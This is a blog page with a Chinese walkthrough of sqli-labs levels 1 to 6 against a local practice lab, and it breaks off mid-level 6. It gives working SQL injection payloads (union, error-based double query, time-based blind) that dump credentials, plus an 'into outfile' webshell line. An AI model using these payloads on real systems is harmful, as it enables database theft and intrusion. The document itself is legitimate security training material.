<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="基础知识sql 注入思路尝试报错–分析报错–分析注入类型–开始暴库 sql 注入类型（基于错误） 有回显：  构造报错的闭合语句  ：/?id=1’ and 1=1(2) union select 1,2,3 –+          联合查询。    无回显：  这个就要利用group by range . 这个函数就是报错性注入了，这类函数有10个   利用outfile 来下载，然后传马（检测">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs 1-10关write up">
<meta property="og:url" content="http://yoursite.com/2019/02/28/sqli-labs/index.html">
<meta property="og:site_name" content="Cherish">
<meta property="og:description" content="基础知识sql 注入思路尝试报错–分析报错–分析注入类型–开始暴库 sql 注入类型（基于错误） 有回显：  构造报错的闭合语句  ：/?id=1’ and 1=1(2) union select 1,2,3 –+          联合查询。    无回显：  这个就要利用group by range . 这个函数就是报错性注入了，这类函数有10个   利用outfile 来下载，然后传马（检测">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/1.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/2.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/3.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/4.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/5.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/6.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/7.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/8.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/9.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/10.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/11.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/12.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/13.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/14.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/15.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/16.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/17.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/18.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/19.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/20.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/21.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/22.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/23.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/24.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/25.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/26.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/27.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/28.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/29.png">
<meta property="og:image" content="http://yoursite.com/2019/02/28/sqli-labs/30.png">
<meta property="og:updated_time" content="2019-03-08T08:52:43.832Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="sqli-labs 1-10关write up">
<meta name="twitter:description" content="基础知识sql 注入思路尝试报错–分析报错–分析注入类型–开始暴库 sql 注入类型（基于错误） 有回显：  构造报错的闭合语句  ：/?id=1’ and 1=1(2) union select 1,2,3 –+          联合查询。    无回显：  这个就要利用group by range . 这个函数就是报错性注入了，这类函数有10个   利用outfile 来下载，然后传马（检测">
<meta name="twitter:image" content="http://yoursite.com/2019/02/28/sqli-labs/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/02/28/sqli-labs/">





  <title>sqli-labs 1-10关write up | Cherish</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Cherish</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-主页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            主页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-所有文章">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            所有文章
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/02/28/sqli-labs/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Shang">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Cherish">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">sqli-labs 1-10关write up</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-02-28T21:15:28+08:00">
                2019-02-28
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h1><h2 id="sql-注入思路"><a href="#sql-注入思路" class="headerlink" title="sql 注入思路"></a>sql 注入思路</h2><p>尝试报错–分析报错–分析注入类型–开始暴库</p>
<h2 id="sql-注入类型（基于错误）"><a href="#sql-注入类型（基于错误）" class="headerlink" title="sql 注入类型（基于错误）"></a>sql 注入类型（基于错误）</h2><ol>
<li><p>有回显：</p>
<ul>
<li><p>构造报错的闭合语句  ：/?id=1’ and 1=1(2) union select 1,2,3 –+        </p>
</li>
<li><p>联合查询。</p>
</li>
</ul>
</li>
<li><p>无回显：</p>
<ul>
<li>这个就要利用group by range . 这个函数就是报错性注入了，这类函数有10个</li>
</ul>
</li>
<li><p>利用outfile 来下载，然后传马（检测有权限的）     </p>
</li>
<li><p>盲注：</p>
<ul>
<li><p>基于布尔；（可以显示代码的对于错）</p>
</li>
<li><p>基于时间。（啥都没有要啥没有啥）</p>
</li>
</ul>
</li>
</ol>
<h2 id="sql-注入的基本步骤"><a href="#sql-注入的基本步骤" class="headerlink" title="sql 注入的基本步骤"></a>sql 注入的基本步骤</h2><ol>
<li><p>判断是什么类型注入，有没过滤了关键字，可否绕过</p>
</li>
<li><p>获取数据库用户，版本，当前连接的数据库等信息</p>
</li>
<li><p>获取某个数据库表的信息</p>
</li>
<li><p>获取列信息</p>
</li>
<li><p>最后就获取数据了</p>
</li>
</ol>
<h2 id="MYSQL-数据库"><a href="#MYSQL-数据库" class="headerlink" title="MYSQL 数据库"></a>MYSQL 数据库</h2><p>首先说一下mysql的数据库information_schema，他是系统数据库，安装完就有，记录是当前数据库的数据库，表，列，用户权限等信息，下面说一下常用的几个表：</p>
<p><strong>SCHEMATA表</strong>:储存mysql所有数据库的基本信息，包括数据库名，编码类型路径等，show databases的结果取之此表。</p>
<p><strong>TABLES表</strong>:储存mysql中的表信息，（当然也有数据库名这一列，这样才能找到哪个数据库有哪些表嘛）包括这个表是基本表还是系统表，数据库的引擎是什么，表有多少行，创建时间，最后更新时间等。show tables from schemaname的结果取之此表。</p>
<p><strong>COLUMNS表</strong>：提供了表中的列信息，（当然也有数据库名和表名称这两列）详细表述了某张表的所有列以及每个列的信息，包括该列是那个表中的第几列，列的数据类型，列的编码类型，列的权限，猎德注释等。是show columns from schemaname.tablename的结果取之此表。</p>
<h2 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h2><p>version()——MySQL 版本</p>
<p>user()——数据库用户名</p>
<p>current_user——当前用户名</p>
<p>database()——数据库名</p>
<p>@@datadir——数据库路径</p>
<p>@@version_compile_os——操作系统版本</p>
<p>into outfile——写入文件，select ‘一句话木马’ into outfile “/var/www/html/test.php”</p>
<p>数据库插入语句：insert into [table] values(a,b,c);</p>
<p>删除语句：delete from [table] where id=1;</p>
<p>修改：update [table] set [column] = ‘abc’ where id =1;</p>
<p>concat(str1,str2,…)——无分隔符地连接字符串</p>
<p>concat_ws(separator,str1,str2,…)——含有分隔符地连接字符串</p>
<p>group_concat(group SEPARATOR ‘;’ )——连接一组字符串，后可加GROUP BY</p>
<p>extractvalue() 从xml中提取数据</p>
<p>length()：返回字符串的长度</p>
<p>substr()：将第一个参数即字符串从第二个参数的位置开始截取第三个参数的长度的字符进行返回（这里第二个参数的位置是从1开始的而不是0）</p>
<p>mid():跟substr函数一样，截取字符串</p>
<p>ascii()：返回字符串的第一个字符的ASCII值</p>
<p>ord():同上，返回ASCII码</p>
<p>if(a,b,c) :a为条件，a为true，返回b，否则返回c，如if(1&gt;2,1,0),返回0</p>
<p>盲注时常见的ASCII：A:65,Z:90 a:97,z:122,  0:48, 9:57</p>
<h1 id="Less-1-GET-Error-based-Single-quotes-String-基于错误的GET单引号字符型注入"><a href="#Less-1-GET-Error-based-Single-quotes-String-基于错误的GET单引号字符型注入" class="headerlink" title="Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)"></a>Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)</h1><p>输入单引号</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-1/?id=1'</span><br></pre></td></tr></table></figure>
<p>发现报了sql语句的语法错误，那么应该存在sql注入，因为没过滤单引号，我们就可以闭合单引号进行注入</p>
<p><img src="/2019/02/28/sqli-labs/1.png" alt="picture 1"></p>
<p>之后进行猜字段</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-1/?id=1'order by 1 <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>当输入到4的时候便报错，由此可知有3个字段</p>
<p>下面直接用union 语句查询，先看看1,2,3</p>
<p><code>http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,2,3 --+</code> </p>
<p>（因为该数据库中有一个limit 0,1来限制，所以只能显示一行数据，如果id=1有结果便可以显示，则后面union即使查询到也不会显示，所以将id设为-1）</p>
<p><img src="/2019/02/28/sqli-labs/2.png" alt="picture 2"></p>
<p>这里只显示了两行数据，看一下源码，可以看到函数mysql_fetch_array只被调用了一次，而mysql_fetch_array() 函数从结果集中取得一行作为关联数组，或数字数组，或二者兼有，具体看你第二个参数是什么，具体可以看<a href="http://www.w3school.com.cn/php/func_mysql_fetch_array.asp" target="_blank" rel="noopener">这里</a>，所以这里无论怎么折腾最后只会出来第一行的查询结果</p>
<p><img src="/2019/02/28/sqli-labs/3.png" alt="picture 3"></p>
<p>所以我们就只能用2,3这两个位置了，但是两个位置应该是不够用的，这时我们就用到数据库的连接函数了，常用的就==concat==和==concat_ws==,其中==concat_ws==的第一个参数是连接字符串的分隔符，还会用到==group__concat==(可以把查询出来的多行连接起来)</p>
<p>之后查询</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-1/?id=-1’ union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="keyword">concat_ws</span>(<span class="built_in">char</span>(<span class="number">32</span>,<span class="number">58</span>,<span class="number">32</span>),<span class="keyword">user</span>(),<span class="keyword">database</span>(),<span class="keyword">version</span>()) <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2019/02/28/sqli-labs/4.png" alt="picture 4"></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-1/?id=-1’ union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="number">0x7365637572697479</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2019/02/28/sqli-labs/5.png" alt="picture 5"></p>
<p>因为最后只返回一个table值，因此需要用到limit，不断变化limit的第一个参数即可枚举所有的表，一旦超出范围，会返回空集</p>
<p><img src="/2019/02/28/sqli-labs/6.png" alt="picture 6"></p>
<p><img src="/2019/02/28/sqli-labs/7.png" alt="picture 7"></p>
<p><img src="/2019/02/28/sqli-labs/8.png" alt="picture 8"></p>
<p><img src="/2019/02/28/sqli-labs/9.png" alt="picture 9"></p>
<p><img src="/2019/02/28/sqli-labs/10.png" alt="picture 10"></p>
<p>接下来列举users的列名，因为一般我们只关心用户的账号密码，有了它其他的登陆后一般就能查看了，拿到管理员的就最好不过了</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-1/?id=-1’ union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="number">0x7365637572697479</span> <span class="keyword">and</span> table_name=<span class="number">0x7573657273</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2019/02/28/sqli-labs/11.png" alt="picture 11"></p>
<h1 id="less-2-GET-Error-based-Intiger-based-基于错误的GET整型注入"><a href="#less-2-GET-Error-based-Intiger-based-基于错误的GET整型注入" class="headerlink" title="less 2 GET - Error based - Intiger based (基于错误的GET整型注入)"></a>less 2 GET - Error based - Intiger based (基于错误的GET整型注入)</h1><p>这里跟上面几乎一样，只是$id没用单引号引着，(因为sql语句对于数字型的数据可以不加单引号),不写单引号的注入就更简单了, 这样我们就得到了用户名和密码。</p>
<p><img src="/2019/02/28/sqli-labs/12.png" alt="picture 12"></p>
<h1 id="less-3-GET-Error-based-Single-quotes-with-twist-string-基于错误的GET单引号变形字符型注入"><a href="#less-3-GET-Error-based-Single-quotes-with-twist-string-基于错误的GET单引号变形字符型注入" class="headerlink" title="less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)"></a>less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)</h1><p>首先加个单引号看看</p>
<p><img src="/2019/02/28/sqli-labs/13.png" alt="picture 13"></p>
<p>可以看到报错那里出来了一个），原来这就是单引号注入的变形，那么我们在没有最终的sql语句的情况下怎么判断呢<br>首先看到near和at之间的字符串，直接将左右的引号去掉，那么就得到’-1’’) LIMIT 0,1<br>我们明显看到-1的右边多了一个’，后面还有个），那么对于的左边也有（。因此构payload为：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-3/?id=-1') union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">group_concat</span>(<span class="built_in">char</span>(<span class="number">32</span>),username,<span class="built_in">char</span>(<span class="number">32</span>)),<span class="keyword">group_concat</span>(<span class="built_in">char</span>(<span class="number">32</span>),<span class="keyword">password</span>,<span class="built_in">char</span>(<span class="number">32</span>)) <span class="keyword">from</span> <span class="keyword">users</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2019/02/28/sqli-labs/14.png" alt="picture 14"></p>
<h1 id="less-4-GET-Error-based-Double-Quotes-String-（基于错误的GET双引号字符型注入）"><a href="#less-4-GET-Error-based-Double-Quotes-String-（基于错误的GET双引号字符型注入）" class="headerlink" title="less 4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）"></a>less 4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）</h1><p>直接上单引号，发现没有报错，这是为什么呢，因为php中双引号可以包含单引号</p>
<p><img src="/2019/02/28/sqli-labs/15.png" alt="picture 15"></p>
<p>所以我们在判断注入时，要加入双引号进行判断</p>
<p><img src="/2019/02/28/sqli-labs/16.png" alt="picture 16"></p>
<p>所以构造payload为</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-4/?id=-1") union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">group_concat</span>(<span class="built_in">char</span>(<span class="number">32</span>),username,<span class="built_in">char</span>(<span class="number">32</span>)),<span class="keyword">group_concat</span>(<span class="built_in">char</span>(<span class="number">32</span>),<span class="keyword">password</span>,<span class="built_in">char</span>(<span class="number">32</span>)) <span class="keyword">from</span> <span class="keyword">users</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2019/02/28/sqli-labs/17.png" alt="picture 17"></p>
<h1 id="less-5-GET-Double-Injection-Single-Quotes-String-双注入GET单引号字符型注入"><a href="#less-5-GET-Double-Injection-Single-Quotes-String-双注入GET单引号字符型注入" class="headerlink" title="less 5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)"></a>less 5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)</h1><p>看到这个报错信息，第一反应就是布尔型盲注、报错型注入、时间延迟型盲注了</p>
<p>下面给出验证时间延迟型的盲注：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-5/?id=1' and sleep(5)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>发现明显延迟，说明猜测正确。接下来的思路是通过延迟，依次爆破数据库长度，数据库名，表名，列名，以及字段。</p>
<p>其实本题不能称作盲注，因为存在回显，真正的盲注时不存在回显的，只能根据浏览器加载页面情况，判定是否注入成功。</p>
<h2 id="方法一：时间延迟型手工注入："><a href="#方法一：时间延迟型手工注入：" class="headerlink" title="方法一：时间延迟型手工注入："></a>方法一：时间延迟型手工注入：</h2><p>时间延迟型手工注入，正确会延迟，错误没有延迟。id无所谓，又不看回显，可以通过浏览器的刷新提示观察延迟情况，但是id正确的时候的回显有利于观察。</p>
<p>时间延迟型和报错型payload核心部分的构造相同</p>
<p>本方法中payload  =  <strong>?id=1’ and if(报错型payload核心部分,sleep(5),1)–+</strong></p>
<p>爆库长payload</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-5/?id=1' and if(length(database())=8,sleep(5),1)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>明显延迟，数据库长度为8.</p>
<p>爆库名payload</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-5/?id=1' and if(left(database(),1)='s',sleep(5),1)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>明显延迟，数据库第一个字符为s，加下来以此增加left(database(),字符长度)中的字符长度，等号右边以此爆破下一个字符，正确匹配时会延迟。最终爆破得到left(database(),8)=’security’</p>
<p>爆表名payload</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-5/?id=1' and if( left((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>),<span class="number">1</span>)=<span class="string">'r'</span> ,<span class="keyword">sleep</span>(<span class="number">5</span>),<span class="number">1</span>)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>通过坚持不懈的测试，终于在limit 3,1 爆破出user表名为users.</p>
<p>爆列名payload</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-5/?id=1' and if(left((<span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=<span class="string">'users'</span> <span class="keyword">limit</span> <span class="number">4</span>,<span class="number">1</span>),<span class="number">8</span>)=<span class="string">'password'</span> ,<span class="keyword">sleep</span>(<span class="number">5</span>),<span class="number">1</span>)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>首先尝试定向爆破，以提高手工注入速度，修改limit x,1 中的x查询password是否存在表中，lucky的是limit 3,1的时候查到了password列，同样的方法查询username ，又一个lucky，接下来爆破字段的值。</p>
<p>爆破值payload</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-5/?id=1' and if(left((<span class="keyword">select</span> <span class="keyword">password</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">order</span> <span class="keyword">by</span> <span class="keyword">id</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">4</span>)=<span class="string">'dumb'</span> ,<span class="keyword">sleep</span>(<span class="number">5</span>),<span class="number">1</span>)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-5/?id=1' and if(left((<span class="keyword">select</span> username <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">order</span> <span class="keyword">by</span> <span class="keyword">id</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">4</span>)=<span class="string">'dumb'</span> ,<span class="keyword">sleep</span>(<span class="number">5</span>),<span class="number">1</span>)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>按照id排序，这样便于对应。注意limit 从0开始.通过坚持不懈的尝试终于爆破到第一个用户的名字dumb，密码dumb，需要注意的是，mysql对大小写不敏感，所以你不知道是Dumb 还是dumb。</p>
<h2 id="方法二，双注入"><a href="#方法二，双注入" class="headerlink" title="方法二，双注入"></a>方法二，双注入</h2><p>根据题目发现是双注入，由于是双注入，百度了一下，总结如下：</p>
<p>双查询注入顾名思义形式上是两个嵌套的查询，即select …(select …)，里面的那个select被称为子查询，他的执行顺序也是先执行子查询，然后再执行外面的select，双注入主要涉及到了几个sql函数：</p>
<p>rand()随机函数，返回0~1之间的某个值</p>
<p>floor(a)取整函数，返回小于等于a，且值最接近a的一个整数</p>
<p>count()聚合函数也称作计数函数，返回查询对象的总数</p>
<p>group by cluase分组语句，按照cluase对查询结果分组</p>
<p>参考链接：<a href="http://www.2cto.com/article/201303/192718.html" target="_blank" rel="noopener">双注入总结</a></p>
<p>双注入的原理总的来说就是，当一个聚合函数后面出现group分组语句时，会将查询的一部分结果以报错的形式返回，他有一个固定的公式。那么开始构建payload：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-5/?id=1' union <span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">count</span>(*), <span class="keyword">concat</span>((<span class="keyword">select</span> <span class="keyword">database</span>()), <span class="keyword">floor</span>(<span class="keyword">rand</span>()*<span class="number">2</span>)) <span class="keyword">as</span> a <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> a <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>该语句有一定的随机性，主要是报错函数的原因，换一个报错函数就会好的</p>
<p><img src="/2019/02/28/sqli-labs/18.png" alt="picture 18"></p>
<p>爆表名payload</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-5/?id=1' union <span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="number">1</span>, <span class="keyword">concat</span>((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="string">'security'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>), <span class="keyword">floor</span>(<span class="keyword">rand</span>()*<span class="number">2</span>)) <span class="keyword">as</span> a <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> a <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2019/02/28/sqli-labs/19.png" alt="picture 19"></p>
<p>爆列名payload</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-5/?id=1' union <span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="number">1</span>, <span class="keyword">concat</span>((<span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="string">'security'</span> <span class="keyword">and</span> table_name=<span class="string">'users'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>), <span class="keyword">floor</span>(<span class="keyword">rand</span>()*<span class="number">2</span>)) <span class="keyword">as</span> a <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> a <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2019/02/28/sqli-labs/20.png" alt="picture 20"></p>
<p><img src="/2019/02/28/sqli-labs/21.png" alt="picture 21"></p>
<p><img src="/2019/02/28/sqli-labs/22.png" alt="picture 22"></p>
<p>爆破值payload</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs-master/Less-5/?id=1' union <span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="number">1</span>, <span class="keyword">concat</span>((<span class="keyword">select</span> <span class="keyword">concat_ws</span>(<span class="built_in">char</span>(<span class="number">32</span>,<span class="number">44</span>,<span class="number">32</span>),<span class="keyword">id</span>,username,<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>), <span class="keyword">floor</span>(<span class="keyword">rand</span>()*<span class="number">2</span>)) <span class="keyword">as</span> a <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> a <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p><img src="/2019/02/28/sqli-labs/23.png" alt="picture 23"></p>
<h2 id="less-6-GET-Double-Injection-Double-Quotes-String-双注入GET双引号字符型注入"><a href="#less-6-GET-Double-Injection-Double-Quotes-String-双注入GET双引号字符型注入" class="headerlink" title="less 6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)"></a>less 6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)</h2><p>输入id=1和id=1’都没报错，当输入id=1”时出现报错，因此可知为双引号的注入</p>
<p><img src="/2019/02/28/sqli-labs/24.png" alt="picture 24"></p>
<p>可知与上题一样，为双引号的双注入，故payload为：</p>
